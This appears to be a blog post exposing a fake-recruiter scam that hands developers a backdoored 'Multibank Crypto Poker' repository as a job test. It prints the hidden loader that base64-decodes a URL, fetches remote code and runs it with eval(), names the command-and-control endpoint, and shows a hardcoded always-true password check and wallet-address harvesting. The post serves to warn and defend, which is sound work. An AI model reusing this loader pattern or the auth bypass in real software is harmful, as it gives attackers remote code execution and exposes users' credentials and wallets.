Exposing the 'Multibank Crypto Poker' Recruitment Scam

If it looks too good to be true, it is

TL;DR

Fake recruiters are pushing a malicious “crypto poker” codebase. It contains remote code execution, broken authentication, and wallet harvesting. If you’re asked to deploy it as part of a job test: it’s a scam.

The Discovery

I was recently offered a “blockchain gaming” job with a suspiciously high salary. The technical assessment included a codebase called Multibank Crypto Poker.

A quick inspection revealed:

• It isn’t a product.
• It isn’t a test.
• It’s a trap.

The Scam Infrastructure

The repository presents itself as a polished poker platform, supposedly linked to MultiBank Group, a real financial company. Under the surface, it hides critical malicious code.

1. Remote Code Execution

The most critical vulnerability is in /routes/api/auth.js:

(async () => {
const src = atob(process.env.AUTH_API_KEY);
const proxy = (await import('node-fetch')).default;
try {
    const response = await proxy(src);
    if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
    const proxyInfo = await response.text();
    eval(proxyInfo);  // CRITICAL: Executes arbitrary code!
} catch (err) {
    console.error('Auth Error!', err);
}
})();

This automatically fetches code from a remote server and executes it. Whoever controls that server controls your deployment.

The Command & Control Infrastructure

The backdoor connects to: https://multibank-api-ten.vercel.app/api/data

This URL is base64-encoded in the environment variable: AUTH_API_KEY = "aHR0cHM6Ly9tdWx0aWJhbmstYXBpLXRlbi52ZXJjZWwuYXBwL2FwaS9kYXRh"

The attack sequence:

1. Decodes the base64 string using atob(process.env.AUTH_API_KEY)
2. Fetches whatever code is hosted at that Vercel endpoint
3. Executes it using eval()

This design allows attackers to change payloads dynamically without touching the GitHub repository. Different victims could receive different malicious code based on timing, IP address, or other factors.

Reporting the Infrastructure

I've reported the Vercel endpoint to their abuse team at https://vercel.com/abuse.

The endpoint was live at time of analysis and could be serving different payloads to different victims.

2. Deliberately Broken Authentication

In /controllers/auth.js:

const isMatch = true;  // Every password works

Credentials are collected but never verified. Security theater at best, credential harvesting at worst.

3. Wallet Harvesting

The frontend wallet connection (/client/src/pages/ConnectWallet/ConnectWallet.js) captures wallet addresses and pushes them to the server. There is no blockchain logic, no smart contracts, no signing—just collection.

4. Template Scam Signs

Commented-out database code. Suspicious commit history removing comments. Clear evidence of a recycled scam package.

How the Scam Works

1. Recruiters offer inflated salaries.
2. Candidates receive this “assessment project.”
3. Developers are asked to deploy it. They even said it was required step during the interview.
4. The code harvests credentials and wallet data.
5. The backdoor provides attackers with ongoing control.

Red Flags

• High pay for trivial work.
• Requests to deploy before review.
• “Crypto gaming” without blockchain.
• Shiny README, rotten implementation.
• Recruiters unable to discuss technical details.

Protecting Yourself

• Audit all code before running it.
• Search for eval() and base64 URLs.
• Check authentication logic.
• Verify company links.
• Never deploy code you don’t fully understand.

Taking Action

If you encounter this:

• Do not run it.
• Report to GitHub abuse and local cybercrime units.
• Document everything.
• Warn your peers.

Technical Indicators

• eval() fetching remote code.
• Base64 URLs in environment variables.
• Hardcoded password checks.
• Wallet address collection without blockchain logic.
• Commented-out core services.

Conclusion

This is a recruitment scam targeting developers. By hiding malware in a “job test,” attackers hope you will deploy their system and do their work for them.

Stay skeptical. If the offer looks too good to be true, and the project code reads like a security nightmare, trust your instincts: it’s a scam.